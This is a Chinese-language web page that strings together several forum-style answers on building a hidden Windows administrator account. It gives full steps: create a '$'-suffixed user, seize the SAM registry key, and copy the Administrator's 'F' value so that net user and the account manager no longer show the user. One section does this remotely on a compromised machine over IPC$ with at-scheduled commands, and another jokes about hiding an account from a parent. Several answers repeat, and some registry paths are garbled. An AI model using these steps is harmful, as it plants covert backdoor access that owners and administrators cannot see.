windows之家1.系统中如何隐藏超级用户?
一、如何在图形界面建立隐藏的超级用户 图形界面下适用本地或开3389终端服务的肉鸡上。
上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。
因为Windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点“权限”来修改。
对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。NT/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。
这样就可以对SAM键内的信息进行读写了了。具体步聚如下: 1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add 2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点“权限”以后会弹出窗口 点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制”。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。
等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。 4、再点“开始”→“运行”并输入“regedit.exe”回车,启动注册表编辑器regedit.exe。
打开键: HKEY_LOCAL_$" 5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键“F”的值复制,并覆盖hacker$对应的项00000409下的键“F”的值,然后再将00000409.reg与hacker.reg合并。 6、在命令行下执行net user hacker$ /del将用户hacker$删除: net user hacker$ /del 7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可 8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。
在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。 9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。
二、如何在命令行下远程建立隐藏的超级用户 在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。 1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。
这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)
2、先与肉鸡建立连接,命令为:net use 13.50.97.238ipc$ "12345678" /user:"administrator 3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动): at 13.50.97.238 12:51 c:winntsystem32net.exe user hacker$ 1234 /add 建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。 4、同样用at命令导出HKEY_LOCAL_下键值: at 13.50.97.238 12:55 c:winntregedit.exe /e hacker.reg HKEY_LOCAL_ /e 是regedit.exe的参数,在_LOCAL_这个键的一定要以结尾。
必要的情况下可以用引号将“c:winntregedit.exe /e hacker.reg HKEY_LOCAL_”引起来。 5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为: copy 13.50.97.238admin$system32hacker.reg c:hacker.reg 修改的方法图形界中已经介绍过了,这里就不作介绍了。
6、再将编辑好的hacker.reg拷回肉鸡上 copy c:hacker.reg 13.50.97.238admin$system32。
2.Windows如何建立隐藏超级用户
方法/步骤:1、以超级用户administrator登录,在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add2、然后点击开始,打开运行,输入:regedt32.exe并回车;3、接着点“权限”,将登录时的帐户添加到安全栏内,并设置为“完全控制";4、点击“开始”→“运行”,输入"regedit.exe" 回车;5、打开:HKEY_LOCAL_$";6、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑;7、将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值;8、然后再将00000409.reg与hacker.reg合并,在命令行下执行net user hacker$ /del;9、将用户hacker$删除:net user hacker$ /del,在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可;10、此时隐藏的超级用户hacker$已经建好了,关闭regedit.exe。
在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
3.Windows如何建立隐藏超级用户?
方法/步骤:
1、以超级用户administrator登录,在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add
2、然后点击开始,打开运行,输入:regedt32.exe并回车;
3、接着点“权限”,将登录时的帐户添加到安全栏内,并设置为“完全控制";
4、点击“开始”→“运行”,输入"regedit.exe" 回车;
5、打开:HKEY_LOCAL_$";
6、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑;
7、将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值;
8、然后再将00000409.reg与hacker.reg合并,在命令行下执行net user hacker$ /del;
9、将用户hacker$删除:net user hacker$ /del,在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可;
10、此时隐藏的超级用户hacker$已经建好了,关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
4.开机时账户登录怎么隐藏超级账户
哈哈,楼主有我当年的风范!我一直就建立隐藏用户,所以我爹爹都发现不了。
有两个方法,一个是注册表,一个是cmd!cmd的比较简单,就是在开始那里【电脑的左下角】。点击运行,输入cmd!然后按回车弹出一个黑色的框框,然后输入命令net user 123$ 123 /add然后按回车,注意中间是有空格和符号的哦!然后他提示命令执行完成后,再输入net localgroup administrators 123 /add再次按回车。
然后就行了,这样你就建立了一个帐号为123$ 密码为123的超级管理员用户!只要在登陆密码的时候按Ctrl+Alt+Del三个键,然后他会变成另外一个登陆画面,在里面登陆输入我教你创建的这个用户和密码就行了。
5.怎么隐藏电脑用户啊,超级管理员也看不到的那种
点击“开始”→“运行”(或者按 win+R 组合键),输入“regedit”,回车,打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM\分支右击SAM,选择“权限”选中“Administrators (FREESKYC-165D01\Administrators)”,将下面的“完全控制”和“读取”勾为“允许”,应用、确定。
点击“开始”→“运行”(或者按 win+R 组合键),输入“cmd”,回车,打开了命令行,键入如下命令:net user abc$ 123 /add 回车,其中abc$为用户名(abc可以改,但是最后的$符号是必须有的),123为密码再键入以下命令可以给abc$ 帐户添加管理员权限:net localgroup administrators abc$ /add关闭注册表编辑器,在命令行下敲入 regedit ,打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\再展开Names,单击“Administrator”,看,右边的“类型”一列为“0x1f4”,于是在左边找到“000001F4”并单击,然后双击右边的“F”,选中如图所示的数据并复制假设刚才创建的用户是图中的me(记得后面要加 $ 符,否则不能达到隐藏的目的!) ,单击它,在右边的“类型”看到的是0x3f2在左列找到000003F2并单击,双击右边的“F”选中如图所示的数据按右键→粘贴,把刚才复制的内容替换上去,确定在左列选中用户名 me ,然后点击“文件”→“导出”,将其保存(例如保存在桌面,文件名为 1.reg);再选中 000003F2 ,将其导出(例如保存在桌面,文件名为 2.reg)回到命令行,执行以下命令:net user abc$ /del 即删除 abc 这个帐户现在可以关闭刚才的所有窗口了,去到1.reg和2.reg所在的文件夹,双击1.reg,点击确定,将其导入注册表,同样,也将2.reg导入。之后这两个文件可以删除了此时无论是在控制面板还是在命令行下执行 net user 命令,都无法看到 abc$ 这个帐户,但是可以用这个帐户登录!在登录界面按Ctrl+Alt+Del组合键,输入用户名(包括$)和密码就可以登录,与Administrator权限相同。
6.怎么隐藏电脑用户啊,超级管理员也看不到的那种
点击“开始”→“运行”(或者按 win+R 组合键),输入“regedit”,回车,打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM\分支右击SAM,选择“权限”选中“Administrators (FREESKYC-165D01\Administrators)”,将下面的“完全控制”和“读取”勾为“允许”,应用、确定。
点击“开始”→“运行”(或者按 win+R 组合键),输入“cmd”,回车,打开了命令行,键入如下命令:
net user abc$ 123 /add 回车,其中abc$为用户名(abc可以改,但是最后的$符号是必须有的),123为密码
再键入以下命令可以给abc$ 帐户添加管理员权限:net localgroup administrators abc$ /add
关闭注册表编辑器,在命令行下敲入 regedit ,打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
再展开Names,
单击“Administrator”,看,右边的“类型”一列为“0x1f4”,于是在左边找到“000001F4”并单击,然后双击右边的“F”,选中如图所示的数据并复制
假设刚才创建的用户是图中的me(记得后面要加 $ 符,否则不能达到隐藏的目的!) ,单击它,在右边的“类型”看到的是0x3f2
在左列找到000003F2并单击,双击右边的“F”选中如图所示的数据
按右键→粘贴,把刚才复制的内容替换上去,确定
在左列选中用户名 me ,然后点击“文件”→“导出”,将其保存(例如保存在桌面,文件名为 1.reg);再选中 000003F2 ,将其导出(例如保存在桌面,文件名为 2.reg)
回到命令行,执行以下命令:
net user abc$ /del
即删除 abc 这个帐户
现在可以关闭刚才的所有窗口了,去到1.reg和2.reg所在的文件夹,双击1.reg,点击确定,将其导入注册表,同样,也将2.reg导入。之后这两个文件可以删除了
此时无论是在控制面板还是在命令行下执行 net user 命令,都无法看到 abc$ 这个帐户,但是可以用这个帐户登录!在登录界面按Ctrl+Alt+Del组合键,输入用户名(包括$)和密码就可以登录,与Administrator权限相同!
转载请注明出处windows之家 » win10如何隐藏超级用户